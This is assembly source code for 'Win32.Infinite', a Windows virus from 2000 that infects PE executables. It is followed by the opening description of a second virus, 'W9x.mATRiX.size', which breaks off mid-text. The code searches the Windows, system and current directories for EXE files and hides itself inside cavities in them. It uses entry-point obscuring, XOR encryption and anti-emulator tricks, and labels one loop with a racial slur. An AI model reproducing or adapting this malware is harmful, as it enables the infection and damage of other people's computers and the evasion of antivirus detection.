;; Guns spitting (out the) message of peace everywhe re; Is it really that we don't care?; See mercenaries of fear selling love; Telling salvation comes from above; Arrogance and fear walking hand in hand; We must see that there's much more to life than t his;; Mother see your children; Make us understand to and help us to find the way; The answers lie inside; They are locked inside to the vault of truth of u s; It's time to spread the word around; Be yourself and do what you want to do with your life; Remember, you get just what you give; You reap all what you sow; You are in charge of your own life; ; Infinity - Where do we go from here?; Infinity - Where do we go from here?; Infinity - Where do we go?; Infinity - Where do we go from here?;; You make your own way;; ------------------------------------------; Infinity - [ Stratovarius ] - ( Infinite );; (c) 2000 Billy Belcebu/iKX [ http:/ /beautifulpeople.cjb.net ]
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Win32.Infinite (c ) 2000 Billy Belcebu/iKX º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
include host.inc ; Some nice includesinclude infinite.inc
virseg segment dword use32 public 'infinite'
virus_start :
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Virus code º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
infinite :push eax ; Make some space on stackpushadcall decrypt
encrypt_start = $call get_delta
call SetSEH ; Set our new protection framemov esp ,[ esp +08h ]call get_deltajmp RestoreSEH
SetSEH:xor edx , edxpush dword ptr fs :[ edx ]mov dword ptr fs :[ edx ], esp
push 05h ; ECX is the limit of pages
pop ecxmov esi , ebp ; We put a page inside our codecall CheckImageBase ; Get our own image basemov dword ptr [ ebp+modbase- delta ], esi
push 05h ; 50 pages to scanpop ecxmov esi ,[ esp +2Ch] ; Put the candidate to kernelcall CheckImageBase ; Scan backwards for itmov dword ptr [ ebp+kernel - delta ], esi
lea eax ,[ ebp+api_list - delta ] ; Let's detect all the neededxchg eax , esi ; APIs :)lea edi ,[ ebp+api_addresses - delta ]call GetAPIs
; Virus is now initialized, let's search for object ives.
lea edi ,[ ebp+current_dir - delta ] ; Save current directory topush edi ; a temp variablepush 7Fhapicall GetCurrentDirectoryA
lea edi ,[ ebp+infect_dir - delta ]push 7Fhpush ediapicall GetWindowsDirectoryAcall SetDir &Infect
lea edi ,[ ebp+infect_dir - delta ]push 7Fhpush ediapicall GetSystemDirectoryAcall SetDir &Infect
lea edi ,[ ebp+current_dir - delta ]push ediapicall SetCurrentDirectoryAcall Seek&Infect
; Now let's unprotect the memory where the epo byte s will be restored
call hh&l ; Hunting high & low :)dq ?
hh&l : push 04h ; PAGE_READWRITEpush epo_bytesmov eax ,dword ptr [ ebp+rethost - delta ]add eax ,dword ptr [ ebp+modbase- delta ]push eaxapicall VirtualProtect
; Now it's time to go away ;)
RestoreSEH :xor edx , edx ; Restore the original SEHpop dword ptr fs :[ edx ]pop edx
mov edi ,( offset host - 400000h )rethost equ $- 4
add edi , 12345678hmodbase equ $- 4
mov [ esp.20h ], edi
call over0sebes db epo_bytes dup ( 90h )over0 : pop esi
push epo_bytespop ecxrep movsb
popadret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Mark of the virus º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
db 0, "Win32.Infinite (c) 2000 Billy Belcebu/iKX" , 0
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Search for files to infect º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
SetDir &Infect :lea edi ,dword ptr [ ebp+infect_dir - delta ]push ediapicall SetCurrentDirectoryA
Seek&Infect :lea eax ,[ ebp+WFD- delta ] ; Search for filespush eaxcall over3db "*.*" , 0 ; Search for all files
over3 : apicall FindFirstFileA
mov dword ptr [ ebp+SearchHandle - delta ], eax
inc eaxjz FailOccured
SearchForMore :push dword ptr [ ebp+modbase- delta ] ; Preserve untouchable infopush dword ptr [ ebp+rethost - delta ]
lea edi ,[( ebp.WFD.szFileName )- delta ] ; Is the file found factiblepush edi ; of being infected?call ProcessExtensionpop edijecxz NotThisTime ; Nopes.
call InfectPE
NotThisTime :pop dword ptr [ ebp+rethost - delta ] ; Restore this interesting pop dword ptr [ ebp+modbase- delta ] ; info
lea edi ,[( ebp.WFD.szFileName )- delta ] ; Fill this with zeroesmov ecx , 260
xor al , alrep stosb
lea eax ,[ ebp.WFD- delta ] ; Search for more little push eax ; suckerspush dword ptr [ ebp+SearchHandle - delta ]
apicall FindNextFileAor eax , eaxjnz SearchForMore
CloseSearchHandle :push dword ptr [ ebp+SearchHandle - delta ]apicall FindClose
FailOccured :ret
ProcessExtension :; input:; EDI - Pointer to file name; output:; ECX - NULL if it is not an extension; 1 if it is.
xor al , al ; Search for NULLscasbjnz $- 1
lea esi ,[ edi - 5] ; Get the extension :)push 05h ; Size to calculate CRC32pop edior dword ptr [ esi ], 20202020h ; Make locase the lewserscall CRC32
cmp eax , 0F643C743h ; Only EXE filesjz ItWasExtension
dec edxItWasExtension :
inc edxmov ecx , edxret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º PE Infection Engine º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
InfectPE :; input:; EDI - Pointer to filename to infect; output:; Nothing.
cmp dword ptr [ ebp+SfcIsFileProtected - delta ], 00hjz NotInWin2k
push edi ; Win2k ability: it has featurepush 00h ; that warns the user if an apicall SfcIsFileProtected ; important file is being
; modified. If the file has or eax , eax ; such protection, we won't jnz ExitInfectPE ; touch it, ok? ;)
NotInWin2k :push 80h ; Destroy hostile attributespush edi ; and put normal ones apicall SetFileAttributesA
xor eax , eax ; Open file for R/Wpush eaxpush eax
push 03h ; OPEN_EXISTING flagpush eaxinc eaxpush eax
push 0C0000000h ; READ / WRITEpush ediapicall CreateFileA
inc eaxjz ExitInfectPEdec eax
mov dword ptr [ ebp+FileHandle - delta ], eax; Save handle of opened file
push eax
push 00hpush eaxapicall GetFileSize ; Get its sizemov dword ptr [ ebp+OriginalSize - delta ], eax
pop ecx ; ECX = Handle
xor ebx , ebx ; EBX = 0push ebxpush 00h ; push sizepush ebxpush 04hpush ebxpush ecx ; push handleapicall CreateFileMappingA
or eax , eaxjz CloseFileExitInfectPE
mov dword ptr [ ebp+MapHandle - delta ], eax
xor ebx , ebxpush 00h ; We want map only file size push ebxpush ebxpush 02hpush eaxapicall MapViewOfFile
or eax , eaxjz UnMap&CloseMap &FileExitInfectPE
mov dword ptr [ ebp+MapAddress - delta ], eax
mov esi ,[ eax +3Ch] ; Ptr to PE header =]add esi , eaxmov dword ptr [ ebp+PtrPEH - delta ], esi
cmp word ptr [ esi ], "EP" ; Check for PE markjnz Trunc &UnMap&CloseMap &FileExitInfectPE
cmp dword ptr [ esi.MagicInfection ], inf_markjz Trunc &UnMap&CloseMap &FileExitInfectPE ; Check for previous infection
cmp word ptr [ esi.Machine ], 014Chjnz Trunc &UnMap&CloseMap &FileExitInfectPE ; Check for i386 ;)
cmp dword ptr [ ebp.WFD.nFileSizeHigh - delta ], 00hjne Trunc &UnMap&CloseMap &FileExitInfectPE ; Don't allow huge & ugly files
cmp dword ptr [ ebp.WFD.nFileSizeLow - delta ], 4000hjb Trunc &UnMap&CloseMap &FileExitInfectPE ; Don't allow too little files
mov eax ,[ esi.EntrypointRVA ] ; EAX = Old file's EIPmov dword ptr [ ebp+rethost - delta ], eax
mov edi , esiadd esi , 0F8h- 28h ; Pointer to 1st section-28h
nigger : add esi , 28h ; Ptr to section name ;)mov edx , eax ; Put in EDX the original EIPsub edx ,[ esi.VirtualAddress ] ; Remove the VirtualAddresscmp edx ,[ esi.VirtualSize ] ; Is EIP pointing to this sec?jae nigger ; If not, loop again
mov ebx ,dword ptr [ ebp+MapAddress - delta ]
pushadpush dword ptr [ esi.SizeOfRawData ] ; Some tricky thing :)pop dword ptr [ esi.VirtualSize ]mov eax ,[ ebp+rethost - delta ]add eax , ebxmov dword ptr [ ebp+tempshit - delta ], eaxpopad
add ebx ,[ esi.PtrToRawData ]add edx , ebxmov esi , edx ; ESI - Pointer to sectionmov dword ptr [ ebp+EPofs - delta ], esi ; mapped in mem where da EP is.
mov ebx ,dword ptr [ ebp+OriginalSize - delta ] ; Search limitmov ecx , heap_end - virus_start +security ; How many space do we needcall SeekForHolesjc ThereWasNoHole
pushadsub eax ,dword ptr [ ebp+MapAddress - delta ]mov esi ,dword ptr [ ebp+PtrPEH - delta ]mov edi , esi ; We wanna put some attribsadd esi , 0F8h- 28h ; to the section where the
niggr2 : add esi , 28h ; virus code is located, somov edx , eax ; we've to search for it :)sub edx ,[ esi.VirtualAddress ]cmp edx ,[ esi.VirtualSize ]jae niggr2
; EAX = Ptr to hole
mov dword ptr [ ebp+inf_switch - delta ], 00h
; Let's check if we can put ourselves inside the ho le (more security)
mov edx ,[ esi.VirtualAddress ]add edx ,[ esi.VirtualSize ]add eax ,(( heap_end - virus_start )+ security )sub edx , eaxjs wecantinfecttheremov dword ptr [ ebp+inf_switch - delta ], 01hor [ esi.Characteristics ], 0A0000020h ; PUT IT SUCKA!
wecantinfectthere :popad
mov ecx , 12345678horg $- 4
inf_switch dd ?or ecx , ecxjz Trunc &UnMap&CloseMap &FileExitInfectPE
lea esi ,[ ebp+virus_start - delta ]mov edi , eaxadd edi , security ; Some security :)
pushadmov eax , 12345678h ; Let's calculate where the
tempshit = $- 4 ; jmp must point toadd eax ,( killemu - epo )sub edi , eaxmov dword ptr [ ebp+jmpadd - delta ], edipopad
mov ecx , virus_sizerep movsb
; Encrypt with a silly l00p
pushadsub edi , virus_end - encrypt_startmov esi , edicall randommov bl , almov byte ptr [ edi +enc_key - encrypt_start ], blmov byte ptr [ ebp+enc_k3y - delta ], blmov ecx , encrypt_end - encrypt_start
enc_l00p :lodsbxor al , blstosbloop enc_l00ppopad
pushadsub edi ,( virus_size -( sebes - virus_start ))mov esi ,dword ptr [ ebp+EPofs - delta ]push epo_bytespop ecxpushad
lewpit :lodsb ; Store EPO bytes alsoxor al , 00h ; encrypted
enc_k3y = $- 1stosbloop lewpit
popadxchg edi , esi
call over69
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿epo : call killemu ;³ This code will give the control to the
mov esp ,[ esp +08h ] ;³ virus and avoid the scanning of emulatorsxor edx , edx ;³ at the same time :) pop dword ptr fs :[ edx ] ;³
pop edx ;³db 0E9h ;³
jmpadd : dd ? ;³killemu : xor edx , edx ;³
push dword ptr fs :[ edx ] ;³mov fs :[ edx ], esp ;³div edx ;³
epo_bytes = $- epo ;³;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
over69 : pop esi
rep movsbpopad
mov esi ,dword ptr [ ebp+PtrPEH - delta ]mov dword ptr [ esi.MagicInfection ], inf_mark ; Put inf. mark
; Fix checksum if needed
add esi , 58hcmp dword ptr [ esi ], 00hjz Trunc &UnMap&CloseMap &FileExitInfectPE
push esi ; Pointer to CheckSum fieldcall n4t4sdd ? ; Where store old CheckSum
n4t4s : push dword ptr [ ebp+OriginalSize - delta ]push dword ptr [ ebp+MapAddress - delta ]apicall CheckSumMappedFile
ThereWasNoHole :Trunc &UnMap&CloseMap &FileExitInfectPE :UnMap&CloseMap &FileExitInfectPE :
push dword ptr [ ebp+MapAddress - delta ]apicall UnmapViewOfFile
CloseMap &FileExitInfectPE :push dword ptr [ ebp+MapHandle - delta ]apicall CloseHandle
CloseFileExitInfectPE :push dword ptr [ ebp+FileHandle - delta ]apicall CloseHandle
ExitInfectPE :ret
SeekForHoles :; input:; ESI - Pointer inside file (in PE header); ECX - How many space do we need; EBX - Search limit; output:; EAX - Pointer to the beginning of the shit; CF - Set if error (couldn't find hole)
call SetSEH1mov esp ,[ esp +08h ] ; Just for security of call get_delta ; scanning :)jmp NSE_
SetSEH1:xor edx , edx
push dword ptr fs :[ edx ]mov dword ptr fs :[ edx ], esp
push esiGetAnotherByte :
xor edx , edx ; Clear counter :)GAB2: dec ebx ; Check if we arrived until
jz NoShitEnough ; the limit (run away if so)lodsbor al , al ; NULL byte?jz IsFillBytecmp al , 0CCh ; Int 3? (VC6 filez're fulljnz GetAnotherByte ; of them)
IsFillByte :inc edx ; Increase countercmp ecx , edxjnz GAB2
WeFoundManyShit :sub esi , ecx ; ESI = Point to shitxchg eax , esipop esipop dword ptr fs :[ 00h ]pop edxret
NoShitEnough :pop esi
NSE_: stcpop dword ptr fs :[ 00h ]pop edxret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º APICRC32 Search Engine º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
GetAPIs proc; input:; EAX - Base address of the library where sea rch the APIs; ESI - Pointer to an array of CRC32 of the A PIs we want to search; EDI - Pointer to where store the APIs; output:; Nothing.
push eax ; EAX = Handle of modulepop dword ptr [ ebp+TmpModuleBase - delta ]
APIS33K :lodsd ; Get in EAX the CRC32 of API
push esi edicall GetAPI_ET_CRC32
pop edi esistosd ; Save in [EDI] the API address
cmp byte ptr [ esi ], 0BBh ; There are more APIs in thisjnz APIS33K ; library
inc esi ; Check if it's the last ofcmp byte ptr [ esi ], " DC4" ; all themjz EndOfAPISearch
push esi ; ESI points now to the ASCIIzapicall LoadLibraryA ; string of a library... We
; need to load it!push eax
nxtchr : lodsb ; Reach the end of the libtest al , al ; asciiz namejnz nxtchr
pop eaxjmp GetAPIs
EndOfAPISearch :ret
GetAPIs endp
GetAPI_ET_CRC32 proc; input:; EAX - CRC32 of the API we want to know its address; output: ; EAX - API address, NULL if error
xor edx , edx
pushad
call over_APICRC32_SEHmov esp ,[ esp +08h ] ; Set stack as beforexor eax , eax ; signalize the errorjmp Remove_APICRC32_SEH
over_APICRC32_SEH :push dword ptr fs :[ edx ] ; Set new SEH framemov dword ptr fs :[ edx ], esp
xchg eax , edx ; Put CRC32 of da api in EDXmov dword ptr [ ebp+Counter - delta ], eax ; Clear this field :)push 3Chpop esiadd esi ,[ ebp+TmpModuleBase - delta ] ; Get PE header of module
lodswadd eax ,[ ebp+TmpModuleBase - delta ] ; Normalize
push 1Chpop esiadd esi ,[ eax +78h ] ; Get a pointer to its edataadd esi ,[ ebp+TmpModuleBase - delta ]
lea edi ,[ ebp+AddressTableVA - delta ] ; Pointer to the address tablelodsd ; Get AddressTable value
add eax ,[ ebp+TmpModuleBase - delta ] ; Normalizestosd ; And store in its variable
lodsd ; Get NameTable valueadd eax ,[ ebp+TmpModuleBase - delta ] ; Normalize
push eax ; Put it in stackstosd ; Store in its variable
lodsd ; Get OrdinalTable valueadd eax ,[ ebp+TmpModuleBase - delta ] ; Normalize
stosd ; Store
pop esi ; ESI = NameTable VA
@?_3: lodsd ; Get pointer to an API namepush esi ; Save againadd eax ,[ ebp+TmpModuleBase - delta ] ; Normalize
xchg edi , eax ; Store ptr in EDImov ebx , edi ; And in EBX
push edi ; Save EDIxor al , alscasbjnz $- 1
pop esi ; ESI = Pointer to API Name
sub edi , ebx ; EDI = API Name size
push edx ; Save API's CRC32call CRC32 ; Get actual api's CRC32pop edx ; Restore API's CRC32cmp edx , eax ; Are them equal?jz @?_4 ; if yes, we got it
pop esi ; Restore ptr to api nameinc dword ptr [ ebp+Counter - delta ] ; And increase the counter
jmp @?_3 ; Get another api!@?_4:
pop esi ; Remove shit from stackmov eax , 12345678h ; Put in EAX the number that
Counter = $- 4 ; the API occupy in list.shl eax , 1 ; *2 (it's an array of words)
add eax ,[ ebp+OrdinalTableVA - delta ] ; Normalizexchg eax , esi ; ESI = Ptr 2 ordinal; EAX = 0lodsw ; Get ordinal in AXcwde ; Clear MSW of EAXshl eax , 2 ; And with it we go to the
add eax ,[ ebp+AddressTableVA - delta ] ; AddressTable (array ofxchg esi , eax ; dwords)lodsd ; Get Address of API RVA
add eax ,[ ebp+TmpModuleBase - delta ] ; and normalize!! That's it!
Remove_APICRC32_SEH:xor edx , edx ; Remove that SEH framepop dword ptr fs :[ edx ]pop edxmov [ esp.1Ch ], eaxpopad
retGetAPI_ET_CRC32 endp
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Subroutines º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
CRC32:; input:; ESI - Pointer to the data to process; EDI - Size of such data; output:; EAX - CRC32 of that data
cldpushadxor ecx , ecx ; Optimized by me - 2 bytes
dec ecx ; lessmov edx , ecx
NextByteCRC :xor eax , eaxxor ebx , ebx
lodsbxor al , clmov cl , chmov ch , dlmov dl , dhmov dh, 8
NextBitCRC :shr bx , 1rcr ax , 1jnc NoCRCxor ax , 08320hxor bx , 0EDB8h
NoCRC: dec dhjnz NextBitCRCxor ecx , eaxxor edx , ebx
dec edijnz NextByteCRCnot edxnot ecx
xchg eax , edxrol eax , 10h
mov ax , cxmov [ esp.PUSHAD_EAX], eaxpopad
ret
CheckImageBase :; input:; ESI - Address inside module; ECX - Limit; output:; ESI - module address
and esi , 0FFFF0000hcmp word ptr [ esi ], "ZM"jz ItWasKewlEnough
NotCoolAddress :sub esi , 00010000hloop CheckImageBase
ItWasKewlEnough :ret
random :; input:; Nothing.; output:; EAX - Random number
apicall GetTickCountxor eax , 12345678horg $- 4
seed dd - 1mov dword ptr [ ebp+seed - delta ], eaxret
; Let's save some bytes ;)
get_delta :call delta ; Get a relative address from
delta : pop ebp ; when calculate offsetsret
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Virus Data º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
api_list = $; db "KERNEL32",0 ; Don't needed
@VirtualProtect dd 079C3D4BBh@FindFirstFileA dd 0AE17EBEFh@FindNextFileA dd 0AA700106h@FindClose dd 0C200BE21h@CreateFileA dd 08C892DDFh@SetFileAttributesA dd 03C19E536h@CloseHandle dd 068624A9Dh@GetCurrentDirectoryA dd 0EBC6C18Bh@SetCurrentDirectoryA dd 0B2DBD7DCh@GetWindowsDirectoryA dd 0FE248274h@GetSystemDirectoryA dd 0593AE7CEh@CreateFileMappingA dd 096B2D96Ch@MapViewOfFile dd 0797B49ECh@UnmapViewOfFile dd 094524B42h@SetEndOfFile dd 059994ED6h@GetFileSize dd 0EF7D811Bh@SetFilePointer dd 085859D42h@GetSystemTime dd 075B7EBE8h@LoadLibraryA dd 04134D1ADh@FreeLibrary dd 0AFDF191Fh@GlobalAlloc dd 083A353C3h@GlobalFree dd 05CDF6B6Ah@WriteFile dd 021777793h@GetProcAddress dd 0FFC97C1Fh@GetTickCount dd 0613FD7BAh
db 0BBh
db "IMAGEHLP" , 0@CheckSumMappedFile dd 078B31744h
db 0BBh
db "SFC" , 0@SfcIsFileProtected dd 06DE8F7ABh
db 0BBh
; That's the end, my friend...
db " DC4"
encrypt_end = $
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Simple decryption l00p :) º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
decrypt :pop esimov edi , esimov ecx , encrypt_end - encrypt_startmov bl , 00h
enc_key = $- 1dec_l00p :
lodsbxor al , blstosbloop dec_l00pjmp encrypt_start
virus_end = $
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»; º Virus Data in the heap º; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
kernel dd ?TmpModuleBase dd ?AddressTableVA dd ?NameTableVA dd ?OrdinalTableVA dd ?OriginalSize dd ?SearchHandle dd ?FileHandle dd ?MapHandle dd ?MapAddress dd ?PtrPEH dd ?EPofs dd ?
api_addresses = $
; KERNEL32 APIs
VirtualProtect dd ?FindFirstFileA dd ?FindNextFileA dd ?FindClose dd ?CreateFileA dd ?SetFileAttributesA dd ?CloseHandle dd ?GetCurrentDirectoryA dd ?SetCurrentDirectoryA dd ?GetWindowsDirectoryA dd ?GetSystemDirectoryA dd ?CreateFileMappingA dd ?MapViewOfFile dd ?UnmapViewOfFile dd ?SetEndOfFile dd ?GetFileSize dd ?SetFilePointer dd ?GetSystemTime dd ?LoadLibraryA dd ?FreeLibrary dd ?GlobalAlloc dd ?GlobalFree dd ?WriteFile dd ?GetProcAddress dd ?GetTickCount dd ?
; IMAGEHLP APIs
CheckSumMappedFile dd ?
; SFC APIs
SfcIsFileProtected dd ?
; Other datas
WFD WIN32_FIND_DATA<?>infect_dir db 7Fh dup (?)current_dir db 7Fh dup (?)
heap_end = $
virseg ends
end infinite
;------------------------------[ INFINITE.INC ]---- --------------------------;
;************************************************** **************************;** This is the include file for the constant and m acros of the virus **;************************************************** **************************
; Constants
virus_size = virus_end - virus_starttotal_size = heap_end - virus_startinf_mark = "AIAG"
security = 20d ; Very important
PUSHAD_EDI = 00hPUSHAD_ESI = 04hPUSHAD_EBP = 08hPUSHAD_ESP = 0ChPUSHAD_EBX = 10hPUSHAD_EDX = 14hPUSHAD_ECX = 18hPUSHAD_EAX = 1Ch
; Some PE header stuff
MagicPE = 00hMachine = 04hNumberOfSections = 06hEntrypointRVA = 28hCodeRVA = 2ChFileAlignment = 3ChMagicInfection = 4ChSizeOfImage = 50hCheckSum = 58hPECharacteristics = 5EhDirEntryReloc = 0A0h
; Some section header fields
SectionName = 00hVirtualSize = 08hVirtualAddress = 0ChSizeOfRawData = 10hPtrToRawData = 14hPtrToReloc = 18hNumOfReloc = 20hCharacteristics = 24h
; Macros
apicall macro api2callcall dword ptr [ ebp+api2call - delta ]endm
; Structures
WIN32_FIND_DATA strucdwFileAttributes dd ?ftCreationTime dq ?ftLastAccessTime dq ?ftLastWriteTime dq ?nFileSizeHigh dd ?nFileSizeLow dd ?dwReserved0 dd ?dwReserved1 dd ?szFileName db 260 dup (?)szAlternateFileName db 13 dup (?)
db 03 dup (?)WIN32_FIND_DATA ends
;-------------------------------[ HOST.INC ]------- -------------------------;
;************************************************** **************************;** This is the host for the first generation **;************************************************** **************************
.586p
.model flat,stdcall
extrn MessageBoxA : PROCextrn ExitProcess : PROC
_DATA segment dword use32 public 'DATA'
szTtl db "Win32.Infinite" , 0szMsg db "Size "
db virus_size / 1000 mod 10 + "0"db virus_size / 0100 mod 10 + "0"db virus_size / 0010 mod 10 + "0"db virus_size / 0001 mod 10 + "0"db " - "db "Virtual "db total_size / 1000 mod 10 + "0"db total_size / 0100 mod 10 + "0"db total_size / 0010 mod 10 + "0"db total_size / 0001 mod 10 + "0"db 10, "(c) 2000 Billy Belcebu/iKX" , 0
_DATA ends
_TEXTNUL segment dword use32 public NUL'CODE'
virus_init procjmp virus_start
host :db epo_bytes dup ( 90h )call MessageBoxA , 0, offset szMsg, offset szTtl , 0call ExitProcess , 0
virus_init endp
_TEXT ends
;comment ÿ;;released;;ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú; ÜÜÜÜÜ °; ÛÛÛÛ ° ßßßß ÛÛÛÛßÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛþ ßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛ2000; ° ²ÛÛÛ ° ÛÛÛÛ ²ÛÛÛÜ ° ÛÛÛÛþ ÛÛÛÛ ° ²ÛÛÛ ÛÛÛÛ ÛÛÛÛ ° ²ÛÛÛþ °;°°°°²ÛÛÛ°ÛÛÛÛ°²ÛÛÛ°ÛÛÛÛ°°°°°ÛÛÛÛ°ÛÛÛÛ°²ÛÛÛ°Û°ÛÛÛÛ° ²ÛÛÛ°²ÛÛÛ°°°°°°²ÛÛÛ°ÛÛÛÛ° °°; ° ²ÛÛÛÜÛÛÛÛܲÛÛÛ ²ÛÛÛ ° ²ÛÛÛÜÛÛÛÛ ²ÛÛÛÜÛÜÛÛÛÛ ²²ÛÛܲÛÛÛ ° °²ÛÛÛÜÛÛÛÛ[LW]; ßßßßßßß °; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - w ww.shadowvx.org;;; Intro;; This virus is my first windows virus, and the result of reading some; docs, tutorial and (Ring0 virus)-sources.;; It is not a very complicated virus, and it doesn't use new technics; too... Maybe the ASCII counter is some unu sual feature.;; When debugging is enabled, this things are extra:;; Unload when dword at bff70400 <> 0h; Beep at certain events (get resident, unlo ad & infect); Beep can be turned off by changing byte pt r at bff70408 <> 0h; only infects files at your D: drive (it's my test drive);; I use WinIce to modify the values.;; Specs:;; Ring0 resident, infects on IFSmgr file ren ame, open and attrib, EXE,; SCR and COM (!) files. Com files are infec ted for the payload, a scene; from The Matrix. The COM files are not rea lly infected, but some date; checking code and action is appended on it . When the month is equal; to the date the payload will start.;; Infection : Increasing last section, and make a jump at orignal; entrypoint to it (when modify ing EP to last section; AVPM will popup:( );; Encryption : XOR'd and polymorfic-build-up -decryptors.; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE);; Payload(s) : 2, as i said above 1 which is appended to all .com files; on opening and c:\windows\win .com which will display; 'Wake up Neo... / The 